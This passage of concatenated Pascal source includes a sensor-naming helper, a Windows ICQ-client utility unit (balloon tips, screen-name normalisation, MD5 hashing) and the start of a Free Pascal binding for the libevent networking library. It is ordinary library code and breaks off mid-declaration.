High(TJsonField) do if AStr = CJsonField[jf] then Exit(jf); end; function MakeSensorName(const AType: TSensorType): string; begin Result := CSensorNamePrefix[AType] + ':' + CSensorMeasureStr[CSensorMeasureByType[AType]]; end; function MakeSensorName(const AType: TSensorType; const AIdx: Integer): string; begin Result := CSensorNamePrefix[AType] + '_' + IntToStr(AIdx) + ':' + CSensorMeasureStr[CSensorMeasureByType[AType]]; end; function GetSensorIdx(const AName: string): Integer; var ColonPos: Integer; UnderPos: Integer; begin Result := -1; UnderPos := Pos('_', AName); ColonPos := Pos(':', AName); if (UnderPos > 1) and (ColonPos > 1) then Result := StrToIntDef(Copy(AName, UnderPos + 1, ColonPos - UnderPos - 1), -1); end; function GetSensorName(const AName: string): string; var ColonPos: Integer; UnderPos: Integer; begin Result := AName; UnderPos := Pos('_', AName); ColonPos := Pos(':', AName); if UnderPos > 1 then Result := Copy(AName, 1, UnderPos) else if ColonPos > 1 then Result := Copy(AName, 1, ColonPos); end; function GetSensorMeasure(const AName: string): TSensorMeasure; var ColonPos: Integer; SensorMeasureStr: string; begin Result := smUnknown; ColonPos := Pos(':', AName); if ColonPos > 1 then begin SensorMeasureStr := Copy(AName, ColonPos + 1, Length(AName) - ColonPos); for Result := Low(TSensorMeasure) to High(TSensorMeasure) do if CSensorMeasureStr[Result] = SensorMeasureStr then Exit; Result := smUnknown; end; end; end.
unit exUtils; (***************************************************************************** (c) 2006, 5190@mail.ru *****************************************************************************) interface uses StdCtrls, Windows, Messages, SysUtils, ShellApi, OSCARMd5, Classes; type PEditBallonTip = ^TEditBallonTip; TEditBallonTip = packed record cbStruct: DWORD; pszTitle: PWideChar; pszText: PWideChar; ttiIcon: Integer; end; const ECM_FIRST = $1500; EM_SHOWBALLOONTIP = (ECM_FIRST + 3); TTI_NONE = 0; TTI_INFO = 1; TTI_WARNING = 2; TTI_ERROR = 3; procedure exShowWinMsg(EditCtl: HWnd; Text: string; Caption: string; Icon: Integer; Balloon: Boolean); procedure exDisableSysMenuItem(Handle: THandle; const Item: Integer); function exIsWinXPMin: Boolean; procedure exUpdateSysMenu(Handle: THandle; Cmd1: Integer; const Menu: string); function exIsValidCharacters(Value: string): Boolean; function exScreenNameIsIcqNumber(SN: string): Boolean; function exNormalizeScreenName(SN: string) :string; function exNormalizeIcqNumber(SN: string) :string; function exUpdateHandCursor: HCURSOR; function exIsValidMD5(MD5Hex: string): Boolean; function exNowTime: string; function GetNewestMd5Hash(Value: string): string; implementation procedure exDisableSysMenuItem(Handle: THandle; const Item: Integer); var SysMenu: HMenu; begin SysMenu := GetSystemMenu(Handle, False); EnableMenuItem(SysMenu, Item, MF_DISABLED or MF_GRAYED); end; {*****************************************************************************} function StrToWChar(Source: string; var Dest: PWideChar): Integer; begin Result := (Length(Source) * SizeOf(WideChar)) + 1; GetMem(Dest, Result); Dest := StringToWideChar(Source, Dest, Result); end; {*****************************************************************************} procedure exShowWinMsg(EditCtl: HWnd; Text: string; Caption: string; Icon: Integer; Balloon: Boolean); var ebt: TEditBallonTip; btn: Integer; l1, l2: Integer; begin if Balloon then begin FillChar(ebt, sizeof(ebt), 0); l1 := StrToWChar(Caption, ebt.pszTitle); l2 := StrToWChar(Text, ebt.pszText); ebt.ttiIcon := Icon; ebt.cbStruct := sizeof(ebt); SendMessage(EditCtl, EM_SHOWBALLOONTIP, 0, LongInt(@ebt)); FreeMem(ebt.pszTitle, l1); FreeMem(ebt.pszText, l2); end else begin case Icon of TTI_INFO: btn := MB_ICONINFORMATION; TTI_WARNING: btn := MB_ICONWARNING; TTI_ERROR: btn := MB_ICONERROR; else btn := 0; end; MessageBox(EditCtl, PChar(Text), PChar(Caption), btn); end; end; {*****************************************************************************} function exIsWinXPMin: Boolean; var oi: TOSVersionInfo; begin FillChar(oi, SizeOf(oi), 0); oi.dwOSVersionInfoSize := SizeOf(oi); GetVersionEx(oi); Result := (oi.dwPlatformId = VER_PLATFORM_WIN32_NT) and (oi.dwMajorVersion >= 5) and (oi.dwMinorVersion >= 1); end; {*****************************************************************************} procedure exUpdateSysMenu(Handle: THandle; Cmd1: Integer; const Menu: string); begin AppendMenu(GetSystemMenu(Handle, False), MF_SEPARATOR, 0, #0); AppendMenu(GetSystemMenu(Handle, False), MF_BYCOMMAND and MF_GRAYED, Cmd1, PChar(Menu)); end; {*****************************************************************************} function exIsValidCharacters(Value: string): Boolean; const ValidAsciiChars = ['a'..'z', 'A'..'Z', '0'..'9', '~', '`', '!', '@', '#', '%', '^', '&', '*', '(', ')', '-', '=', '_', '+', '[', ']', '{', '}', ';', '''', ',', '.', '/', ':', '"', '<', '>', '?']; var i: Integer; begin Result := True; for i := 1 to Length(Value) do if not (Value[i] in ValidAsciiChars) then begin Result := False; Exit; end; end; {*****************************************************************************} function exScreenNameIsIcqNumber(SN: string): Boolean; var I: Real; E: Integer; begin Val(SN, I, E); Result := E = 0; E := Trunc(I); end; {*****************************************************************************} function exNormalizeScreenName(SN: string) :string; function DeleteSpaces(const Value: string): string; var Counter, i: integer; begin Counter := 0; SetLength(Result, Length(Value)); for i := 1 to Length(Value) do if Value[i] <> ' ' then begin Inc(Counter); Result[Counter] := Value[i]; end; SetLength(Result, Counter); end; begin Result := AnsiLowerCase(DeleteSpaces(SN)); end; {*****************************************************************************} function exNormalizeIcqNumber(SN: string) :string; function DeleteDashes(const Value: string): string; var Counter, i: integer; begin Counter := 0; SetLength(Result, Length(Value)); for i := 1 to Length(Value) do if Value[i] <> '-' then begin Inc(Counter); Result[Counter] := Value[i]; end; SetLength(Result, Counter); end; begin Result := DeleteDashes(SN); end; {*****************************************************************************} function exUpdateHandCursor: HCURSOR; begin Result := LoadCursor(0, IDC_HAND); end; {*****************************************************************************} function exIsValidMD5(MD5Hex: string): Boolean; var i: Byte; begin Result := False; if Length(MD5Hex) <> 32 then Exit; for i := 1 to Length(MD5Hex) do if not (MD5Hex[i] in ['0'..'f']) then Exit; Result := True; end; {*****************************************************************************} function exNowTime: string; begin Result := FormatDateTime('hh:mm:ss', Now); end; {*****************************************************************************} function GetNewestMd5Hash(Value: string): string; var Md5C: MD5Context; Md5D: MD5Digest; begin MD5Init(Md5C); MD5Append(Md5C, PChar(Value), Length(Value)); MD5Final(Md5C, Md5D); SetLength(Result, 32); BinToHex(PChar(@Md5D), PChar(Result) , 16); end; end.
unit fre_libevent_core; { (§LIC) (c) Autor,Copyright Dipl.Ing.- Helmut Hartl, Dipl.Ing.- Franz Schober, Dipl.Ing.- Christian Koch FirmOS Business Solutions GmbH www.openfirmos.org New Style BSD Licence (OSI) Copyright (c) 2001-2013, FirmOS Business Solutions GmbH All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the <FirmOS Business Solutions GmbH> nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. (§LIC_END) } {$mode objfpc}{$H+} {-$DEFINE FOS_LINK_STATIC} {-$DEFINE FOS_DEBUG} {-$UNDEF FOS_LINK_STATIC} interface uses Classes, SysUtils,FOS_FCOM_TYPES, cTypes,BaseUnix,unixtype,fre_fcom_ssl ; {$IFDEF WINDOWS} {$ENDIF} {$IFDEF UNIX} {$IFDEF DARWIN} {$IFDEF CPU64} {$IFDEF FOS_DEBUG} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos64_darwin_deb.a} {$linklib libevent_pthreads_fos64_darwin_deb.a} {$linklib libevent_openssl_fos64_darwin_deb.a} {$linklib libevent_extra_fos64_darwin_deb.a} {$ELSE} {$linklib libevent_core_fos64_darwin_deb-fosdev} {$linklib libevent_pthreads_fos64_darwin_deb-fosdev} {$linklib libevent_openssl_fos64_darwin_deb-fosdev} {$linklib libevent_extra_fos64_darwin_deb-fosdev} {$ENDIF FOS_LINK_STATIC} {$ELSE} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos64_darwin_rel.a} {$linklib libevent_pthreads_fos64_darwin_rel.a} {$linklib libevent_openssl_fos64_darwin_rel.a} {$linklib libevent_extra_fos64_darwin_rel.a} {$ELSE} {$linklib libevent_core_fos64_darwin_rel-fosdev} {$linklib libevent_pthreads_fos64_darwin_rel-fosdev} {$linklib libevent_openssl_fos64_darwin_rel-fosdev} {$linklib libevent_extra_fos64_darwin_rel-fosdev} {$ENDIF FOS_LINK_STATIC} {$ENDIF} {$ELSE CPU32} {$IFDEF FOS_DEBUG} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos32_darwin_deb.a} {$linklib libevent_pthreads_fos32_darwin_deb.a} {$linklib libevent_openssl_fos32_darwin_deb.a} {$linklib libevent_extra_fos32_darwin_deb.a} {$ELSE} {$linklib libevent_core_fos32_darwin_deb-fosdev} {$linklib libevent_pthreads_fos32_darwin_deb-fosdev} {$linklib libevent_openssl_fos32_darwin_deb-fosdev} {$linklib libevent_extra_fos32_darwin_deb-fosdev} {$ENDIF FOS_LINK_STATIC} {$ELSE} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos32_darwin_rel.a} {$linklib libevent_pthreads_fos32_darwin_rel.a} {$linklib libevent_openssl_fos32_darwin_rel.a} {$linklib libevent_extra_fos32_darwin_rel.a} {$ELSE} {$linklib libevent_core_fos32_darwin_rel-fosdev} {$linklib libevent_pthreads_fos32_darwin_rel-fosdev} {$linklib libevent_openssl_fos32_darwin_rel-fosdev} {$linklib libevent_extra_fos32_darwin_rel-fosdev} {$ENDIF FOS_LINK_STATIC} {$ENDIF} {$ENDIF CPU32/64} {$ELSE} {$IFDEF FREEBSD} {$IFDEF CPU64} {$IFDEF FOS_DEBUG} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos64_freebsd_deb.a} {$linklib libevent_pthreads_fos64_freebsd_deb.a} {$linklib libevent_openssl_fos64_freebsd_deb.a} {$linklib libevent_extra_fos64_freebsd_deb.a} {$ELSE} {$linklib libevent_core_fos64_freebsd_deb-fosdev} {$linklib libevent_pthreads_fos64_freebsd_deb-fosdev} {$linklib libevent_openssl_fos64_freebsd_deb-fosdev} {$linklib libevent_extra_fos64_freebsd_deb-fosdev} {$ENDIF FOS_LINK_STATIC} {$ELSE NODEBUG} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos64_freebsd_rel.a} {$linklib libevent_pthreads_fos64_freebsd_rel.a} {$linklib libevent_openssl_fos64_freebsd_rel.a} {$linklib libevent_extra_fos64_freebsd_rel.a} {$ELSE} {$linklib libevent_core_fos64_freebsd_rel-fosdev} {$linklib libevent_pthreads_fos64_freebsd_rel-fosdev} {$linklib libevent_openssl_fos64_freebsd_rel-fosdev} {$linklib libevent_extra_fos64_freebsd_rel-fosdev} {$ENDIF FOS_LINK_STATIC} {$ENDIF DEBUG/NODEBUG} {$ELSE CPU32} {$IFDEF FOS_DEBUG} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos32_freebsd_deb.a} {$linklib libevent_pthreads_fos32_freebsd_deb.a} {$linklib libevent_openssl_fos32_freebsd_deb.a} {$linklib libevent_extra_fos32_freebsd_deb.a} {$ELSE} {$linklib libevent_core_fos32_freebsd_deb-fosdev} {$linklib libevent_pthreads_fos32_freebsd_deb-fosdev} {$linklib libevent_openssl_fos32_freebsd_deb-fosdev} {$linklib libevent_extra_fos32_freebsd_deb-fosdev} {$ENDIF FOS_LINK_STATIC} {$ELSE} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos32_freebsd_rel.a} {$linklib libevent_pthreads_fos32_freebsd_rel.a} {$linklib libevent_openssl_fos32_freebsd_rel.a} {$linklib libevent_extra_fos32_freebsd_rel.a} {$ELSE} {$linklib libevent_core_fos32_freebsd_rel-fosdev} {$linklib libevent_pthreads_fos32_freebsd_rel-fosdev} {$linklib libevent_openssl_fos32_freebsd_rel-fosdev} {$linklib libevent_extra_fos32_freebsd_rel-fosdev} {$ENDIF FOS_LINK_STATIC} {$ENDIF} {$ENDIF CPU64/32} {$ELSE} {$IFDEF SOLARIS} {$IFDEF CPU64} {$IFDEF FOS_DEBUG} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos64_solaris_deb.a} {$linklib libevent_pthreads_fos64_solaris_deb.a} {$linklib libevent_openssl_fos64_solaris_deb.a} {$linklib libevent_extra_fos64_solaris_deb.a} {$ELSE} {$linklib libevent_core_fos64_solaris_deb-fosdev} {$linklib libevent_pthreads_fos64_solaris_deb-fosdev} {$linklib libevent_openssl_fos64_solaris_deb-fosdev} {$linklib libevent_extra_fos64_solaris_deb-fosdev} {$ENDIF FOS_LINK_STATIC} {$ELSE} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos64_solaris_rel.a} {$linklib libevent_pthreads_fos64_solaris_rel.a} {$linklib libevent_openssl_fos64_solaris_rel.a} {$linklib libevent_extra_fos64_solaris_rel.a} {$ELSE} {$linklib libevent_core_fos64_solaris_rel-fosdev} {$linklib libevent_pthreads_fos64_solaris_rel-fosdev} {$linklib libevent_openssl_fos64_solaris_rel-fosdev} {!! WARNING USES WRONG OPENSSL LIBRARIES !!!} {$linklib libevent_extra_fos64_solaris_rel-fosdev} {$ENDIF FOS_LINK_STATIC} {$ENDIF} {$ELSE} {$IFDEF FOS_DEBUG} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos32_solaris_deb.a} {$linklib libevent_pthreads_fos32_solaris_deb.a} {$linklib libevent_openssl_fos32_solaris_deb.a} {$linklib libevent_extra_fos32_solaris_deb.a} {$ELSE} {$linklib libevent_core_fos32_solaris_deb-fosdev} {$linklib libevent_pthreads_fos32_solaris_deb-fosdev} {$linklib libevent_openssl_fos32_solaris_deb-fosdev} {$linklib libevent_extra_fos32_solaris_deb-fosdev} {$ENDIF FOS_LINK_STATIC} {$ELSE} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos32_solaris_rel.a} {$linklib libevent_pthreads_fos32_solaris_rel.a} {$linklib libevent_openssl_fos32_solaris_rel.a} {$linklib libevent_extra_fos32_solaris_rel.a} {$ELSE} {$linklib libevent_core_fos32_solaris_rel-fosdev} {$linklib libevent_pthreads_fos32_solaris_rel-fosdev} {$linklib libevent_openssl_fos32_solaris_rel-fosdev} {$linklib libevent_extra_fos32_solaris_rel-fosdev} {$ENDIF FOS_LINK_STATIC} {$ENDIF} {$ENDIF} {$ELSE} {$IFDEF LINUX} {$IFDEF CPU64} {$IFDEF FOS_DEBUG} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos64_linux_deb.a} {$linklib libevent_pthreads_fos64_linux_deb.a} {$linklib libevent_openssl_fos64_linux_deb.a} {$linklib libevent_extra_fos64_linux_deb.a} {$ELSE} {$linklib libevent_core_fos64_linux_deb-fosdev} {$linklib libevent_pthreads_fos64_linux_deb-fosdev} {$linklib libevent_openssl_fos64_linux_deb-fosdev} {$linklib libevent_extra_fos64_linux_deb-fosdev} {$ENDIF FOS_LINK_STATIC} {$ELSE} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos64_linux_rel.a} {$linklib libevent_pthreads_fos64_linux_rel.a} {$linklib libevent_openssl_fos64_linux_rel.a} {$linklib libevent_extra_fos64_linux_rel.a} {$ELSE} {$linklib libevent_core_fos64_linux_rel-fosdev} {$linklib libevent_pthreads_fos64_linux_rel-fosdev} {$linklib libevent_openssl_fos64_linux_rel-fosdev} {$linklib libevent_extra_fos64_linux_rel-fosdev} {$ENDIF FOS_LINK_STATIC} {$ENDIF} {$ELSE CPU32} {$IFDEF FOS_DEBUG} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos32_linux_deb.a} {$linklib libevent_pthreads_fos32_linux_deb.a} {$linklib libevent_openssl_fos32_linux_deb.a} {$linklib libevent_extra_fos32_linux_deb.a} {$ELSE} {$linklib libevent_core_fos32_linux_deb-fosdev} {$linklib libevent_pthreads_fos32_linux_deb-fosdev} {$linklib libevent_openssl_fos32_linux_deb-fosdev} {$linklib libevent_extra_fos32_linux_deb-fosdev} {$ENDIF FOS_LINK_STATIC} {$ELSE} {$IFDEF FOS_LINK_STATIC} {$linklib libevent_core_fos32_linux_rel.a} {$linklib libevent_pthreads_fos32_linux_rel.a} {$linklib libevent_openssl_fos32_linux_rel.a} {$linklib libevent_extra_fos32_linux_rel.a} {$ELSE} {$IFDEF CPUARM} {$linklib libevent_core_fosarmhf32_linux_rel-fosdev} {$linklib libevent_pthreads_fosarmhf32_linux_rel-fosdev} {$linklib libevent_openssl_fosarmhf32_linux_rel-fosdev} {$linklib libevent_extra_fosarmhf32_linux_rel-fosdev} {$ELSE} {$linklib libevent_core_fos32_linux_rel-fosdev} {$linklib libevent_pthreads_fos32_linux_rel-fosdev} {$linklib libevent_openssl_fos32_linux_rel-fosdev} {$linklib libevent_extra_fos32_linux_rel-fosdev} {$ENDIF} {$ENDIF FOS_LINK_STATIC} {$ENDIF} {$ENDIF CPU63/32} {$linklib librt.a} {$ELSE} {$ENDIF} {$ENDIF} {$ENDIF} {$ENDIF} {$ENDIF} {$PACKRECORDS C} const EV_FEATURE_ET = $01; EV_FEATURE_O1 = $02; EV_FEATURE_FDS = $04; EVENT_BASE_FLAG_NOLOCK = $01; EVENT_BASE_FLAG_IGNORE_ENV = $02; EVENT_BASE_FLAG_STARTUP_IOCP = $04; EVENT_BASE_FLAG_NO_CACHE_TIME = $08; EVENT_BASE_FLAG_EPOLL_USE_CHANGELIST = $10; EVLOOP_ONCE = $01; EVLOOP_NONBLOCK = $02; EVLOOP_NO_EXIT_ON_EMPTY = $04; EV_TIMEOUT = $01; EV_READ = $02; EV_WRITE = $04; EV_SIGNAL = $08; EV_PERSIST = $10; EV_ET = $20; BEV_EVENT_READING = $01; //**< error encountered while reading */ BEV_EVENT_WRITING = $02; //**< error encountered while writing */ BEV_EVENT_EOF = $10; //**< eof file reached */ BEV_EVENT_ERROR = $20; //**< unrecoverable error encountered */ BEV_EVENT_TIMEOUT = $40; //**< user-specified timeout reached */ BEV_EVENT_CONNECTED = $80; BEV_NORMAL = 0; BEV_FLUSH = 1; BEV_FINISHED = 2; BEV_OPT_CLOSE_ON_FREE =1 SHL 0; BEV_OPT_THREADSAFE =1 SHL 1; BEV_OPT_DEFER_CALLBACKS =1 SHL 2; BEV_OPT_UNLOCK_CALLBACKS =1 SHL 3; BUFFEREVENT_SSL_OPEN = 0; BUFFEREVENT_SSL_CONNECTING = 1; BUFFEREVENT_SSL_ACCEPTING = 2; // method strings = select,poll,epoll,kqueue,devpoll,evport,win32 type evdns_result = (DNS_IPv4_A=1,DNS_PTR=2,DNS_IPv6_AAAA=3); bufferevent_filter_result = (BEV_OK = 0, BEV_NEED_MORE = 1, BEV_ERROR = 2 ); evbuffer_eol_style = (EVBUFFER_EOL_ANY, EVBUFFER_EOL_CRLF, EVBUFFER_EOL_CRLF_STRICT, EVBUFFER_EOL_LF ); event_base = record end; event_config = record end; event = record end; bufferevent = record end; evbuffer = record end; evdns_base = record end; ev_token_bucket_cfg = record end; bufferevent_rate_limit_group = record end; evdns_getaddrinfo_request = record end; evbuffer_cb_entry = record end; ssl_st = SSL; ev_off_t = off_t; ev_ssize_t = ssize_t; evutil_socket_t = cInt; Pssl_st = ^ssl_st; PEvent_base = ^event_base; Pevent_config = ^event_config; PEvent = ^event; PBufferevent = ^bufferevent; PEvbuffer = ^evbuffer; Pevdns_base = ^evdns_base; Pevdns_getaddrinfo_request = ^evdns_getaddrinfo_request; Pevbuffer_cb_entry = ^evbuffer_cb_entry; Pev_token_bucket_cfg = ^ev_token_bucket_cfg; Pbufferevent_rate_limit_group = ^bufferevent_rate_limit_group; tbuffereventpair = array [0..1] of PBufferevent; tevutil_socket_t_pair = array [0..1] of evutil_socket_t; Pevutil_addrinfo = ^evutil_addrinfo; evbuffer_cb_info = record orig_size : size_t; n_added : size_t; n_deleted : size_t; end; Pevbuffer_cb_info =^evbuffer_cb_info; event_callback_fn = procedure (fd : evutil_socket_t ; short: cshort ; data:pointer) ; cdecl ; event_base_foreach_event_cb = function (const base : PEvent_base ; const event : PEvent ; const data : Pointer):cInt; cdecl ; bufferevent_data_cb = procedure (const bev : PBufferevent ; const ctx : Pointer); cdecl; bufferevent_event_cb = procedure (const bev : PBufferevent ; what: cshort ; const ctx : Pointer); cdecl; bufferevent_filter_cb = function (const srv,dst : PEvbuffer ; dst_limit : ev_ssize_t ; mode : cint ; ctx : Pointer):bufferevent_filter_result; cdecl; free_context = procedure (const ctx : Pointer); cdecl; evdns_callback_type = procedure (dns_result : cint ; typ : cchar ; count : cint ; ttl : cint ; addresses : pointer ; arg : pointer); cdecl; evdns_getaddrinfo_cb = procedure (dns_result : cint ; res : Pevutil_addrinfo ; arg : Pointer); cdecl ; evbuffer_cb_func = procedure (buffer : PEvbuffer ; info : Pevbuffer_cb_info ; arg : Pointer); cdecl; evutil_addrinfo = record ai_flags : cInt; {* AI_PASSIVE, AI_CANONNAME, AI_NUMERICHOST *} ai_family: cInt; {* PF_xxx *} ai_socktype: cInt; {* SOCK_xxx *} ai_protocol: cInt; {* 0 or IPPROTO_xxx for IPv4 and IPv6 *} ai_addrlen: size_t; {* length of ai_addr *} ai_canonname: PChar; {* canonical name for hostname *} ai_addr: PFCOM_SOCKADDRSTORAGE; {* binary address *} ai_next: Pevutil_AddrInfo; {* next structure in linked list *} end; evbuffer_ptr = record pos :ev_ssize_t; _internal: record chain : Pointer; pos_in_chain : size_t; end; end; Pevbuffer_ptr = ^evbuffer_ptr; evbuffer_iovec = record iov_base : Pointer; iov_len : size_t; end; Pevbuffer_iovec = ^evbuffer_iovec; function evthread_use_pthreads : cInt ; cdecl ; external; // only U*xes / posix function evthread_make_base_notifiable (const base : PEvent_base) : cInt ; cdecl ; external; function event_get_version : PChar ; cdecl ; external; function event_base_new : Pevent_base ; cdecl ; external; function event_config_new : Pevent_config ; cdecl ; external; function event_config_require_features (cfg : Pevent_config ; feature : cInt) : cInt ; cdecl ; external; function event_config_set_flag (cfg : Pevent_config ; evb_flag : cInt) : cInt ; cdecl ; external; function event_base_new_with_config (cfg : Pevent_config) : Pevent_base ; cdecl ; external; function event_config_avoid_method (cfg : Pevent_config ; const method : PChar) : cInt ; cdecl ; external; procedure event_config_free (cfg : Pevent_config) ; cdecl ; external; function event_get_supported_methods : PPChar ; cdecl ; external; function event_base_get_method (const base:PEvent_base) : PChar ; cdecl ; external; function event_base_get_features (const base:PEvent_base) : cInt ; cdecl ; external; procedure event_base_free (const base:PEvent_base) ; cdecl ; external; function event_base_priority_init (const base:PEvent_base ; n_prios : cInt) : cInt ; cdecl ; external; function event_base_get_npriorities (const base:PEvent_base ) : cInt ; cdecl ; external; function event_base_loop (const base:PEvent_base ; flags : cInt) : cInt ; cdecl ; external; function event_base_loopexit (const base:PEvent_base ; const tv : PFCOM_TimeVal) : cInt ; cdecl ; external; function event_base_loopbreak (const base:PEvent_base) : cInt ; cdecl ; external; procedure event_base_gettimeofday_cached (const base:PEvent_base ; var tv : TFCOM_TimeVal) ; cdecl ; external; function event_base_foreach_event (const base:PEvent_base ; fn : event_base_foreach_event_cb ; arg : Pointer):cInt ; cdecl ; external; //2.1 alpha function event_new (const base:PEvent_base ; fd : evutil_socket_t ; what: cshort ; cb : event_callback_fn ; arg : Pointer) : PEvent ; cdecl ; external; function event_get_callback_arg (const ev:PEvent) : Pointer ; cdecl ; external; procedure event_free (event :Pevent) ; cdecl ; external; function event_add (event :PEvent ; tv : PFCOM_TimeVal) : cInt ; cdecl ; external; function event_del (event :PEvent ) : cInt ; cdecl ; external; function event_priority_set (event :PEvent; priority : cInt) : cInt ; cdecl ; external; procedure event_active (event :PEvent; what : cInt ; ncalls:cshort) ; cdecl ; external; function bufferevent_socket_new (const base : PEvent_base ; fd : evutil_socket_t ; options : cInt):PBufferevent ; cdecl ; external; function bufferevent_socket_connect (const bev : PBufferevent ; addr : PFCOM_SOCKADDRSTORAGE ; const socklen : cint) :cint ; cdecl ; external; function bufferevent_socket_connect_hostname (const bev : PBufferevent ; evdns_base : Pevdns_base ; family : cInt ; hostname : PChar ; port : cInt):cint ; cdecl ; external; function bufferevent_socket_get_dns_error (const bev : PBufferevent):cInt ; cdecl ; external; function bufferevent_base_set (const base : PEvent_base ; bufev : PBufferevent) :cInt ; cdecl ; external; function bufferevent_get_base (const bev : PBufferevent) : Pevent_base ; cdecl ; external; function bufferevent_priority_set (const bev : PBufferevent ; pri : cInt ) : cInt ; cdecl ; external; procedure bufferevent_free (const bev : PBufferevent) ; cdecl ; external; procedure bufferevent_setcb (const bev : PBufferevent; readcb,writecb : bufferevent_data_cb ; eventcb : bufferevent_event_cb ; cbarg : Pointer); cdecl ; external ; function bufferevent_setfd (const bev : PBufferevent; fd : evutil_socket_t):cInt ; cdecl ; external; function bufferevent_getfd (const bev : PBufferevent):evutil_socket_t; cdecl ; external; function bufferevent_get_underlying (const bev : PBufferevent):PBufferevent; cdecl ; external; function bufferevent_write (const bev : PBufferevent; const data : Pointer ; const size : size_t):cInt; cdecl ; external; function bufferevent_write_buffer (const bev : PBufferevent; const buf : PEvbuffer):cint; cdecl ; external; function bufferevent_read (const bev : PBufferevent; const data : Pointer ; const size : size_t):size_t cdecl ; external; function bufferevent_read_buffer (const bev : PBufferevent; const buf : PEvbuffer):cint; cdecl ; external; function bufferevent_get_input (const bev : PBufferevent):PEvbuffer; cdecl ; external; function bufferevent_get_output (const bev : PBufferevent):PEvbuffer; cdecl ; external; function bufferevent_disable (const bev : PBufferevent; event :cshort):cint; cdecl ; external; function bufferevent_enable (const bev : PBufferevent; event :cshort):cint; cdecl ; external; function bufferevent_get_enabled (const bev : PBufferevent):cshort; cdecl ; external; function bufferevent_set_timeouts (const bev : PBufferevent; const timeout_read,timeout_write : PFCOM_TimeVal):cInt; cdecl ; external; procedure bufferevent_setwatermark (const bev : PBufferevent; events : cshort ; lowmark, highmark : size_t); cdecl ; external; procedure bufferevent_lock (const bev : PBufferevent) ;cdecl ; external; procedure bufferevent_unlock (const bev : PBufferevent) ;cdecl ; external; function bufferevent_flush (const bev : PBufferevent; iotype : cshort ; mode : cint):cint ;cdecl ; external; function bufferevent_filter_new (const underlying : PBufferevent; input_filter,output_filter : bufferevent_filter_cb ; options : cInt ; ftx : free_context ; ctx : Pointer):PBufferevent;cdecl ; external; function bufferevent_pair_new (const bas : PEvent_base ; options : cInt ; pair : tbuffereventpair):cInt ;cdecl ; external; function bufferevent_pair_get_partner (const bev : PBufferevent):PBufferevent;cdecl;external; function ev_token_bucket_cfg_new (const read_rate, read_burst, write_rate, write_burst : size_t ; const tick_len : PFCOM_TimeVal):Pev_token_bucket_cfg ; cdecl ; external; procedure ev_token_bucket_cfg_free (const cfg : Pev_token_bucket_cfg ) ;cdecl ; external; function bufferevent_set_rate_limit (const bev : PBufferevent ; cfg : Pev_token_bucket_cfg):cInt ;cdecl ; external; function bufferevent_rate_limit_group_new (const base : PEvent_base ; cfg : Pev_token_bucket_cfg):Pbufferevent_rate_limit_group;cdecl ; external; function bufferevent_rate_limit_group_set_cfg (const grp : Pbufferevent_rate_limit_group ; cfg : Pev_token_bucket_cfg):cint ;cdecl ; external; function bufferevent_rate_limit_group_set_min_share (const grp : Pbufferevent_rate_limit_group ; const val : size_t):cint ;cdecl ; external; procedure bufferevent_rate_limit_group_free (const grp : Pbufferevent_rate_limit_group) ; cdecl ; external; function bufferevent_add_to_rate_limit_group (const bev : PBufferevent ;const g : Pbufferevent_rate_limit_group):cint; cdecl ; external; function bufferevent_remove_from_rate_limit_group (const bev : PBufferevent) : cint ;cdecl ; external; function bufferevent_get_read_limit (const bev : PBufferevent):ev_ssize_t; cdecl ; external; function bufferevent_get_write_limit (const bev : PBufferevent):ev_ssize_t; cdecl ; external; function bufferevent_get_max_to_read (const bev : PBufferevent):ev_ssize_t; cdecl ; external; function bufferevent_get_max_to_write (const bev : PBufferevent):ev_ssize_t; cdecl ; external; function bufferevent_rate_limit_group_get_read_limit (const grp : Pbufferevent_rate_limit_group):ev_ssize_t;cdecl ; external; function bufferevent_rate_limit_group_get_write_limit (const grp : Pbufferevent_rate_limit_group):ev_ssize_t;cdecl ; external; function evdns_getaddrinfo (dns_base : Pevdns_base ; const nodename : PChar ; const servname : PChar ; const hints_in : Pevutil_addrinfo ; cb : evdns_getaddrinfo_cb ; arg : Pointer):Pevdns_getaddrinfo_request ; cdecl ; external; procedure evdns_getaddrinfo_cancel (req : Pevdns_getaddrinfo_request); cdecl ; external ; //int bufferevent_decrement_read_limit(struct bufferevent *bev, ev_ssize_t decr); //int bufferevent_decrement_write_limit(struct bufferevent 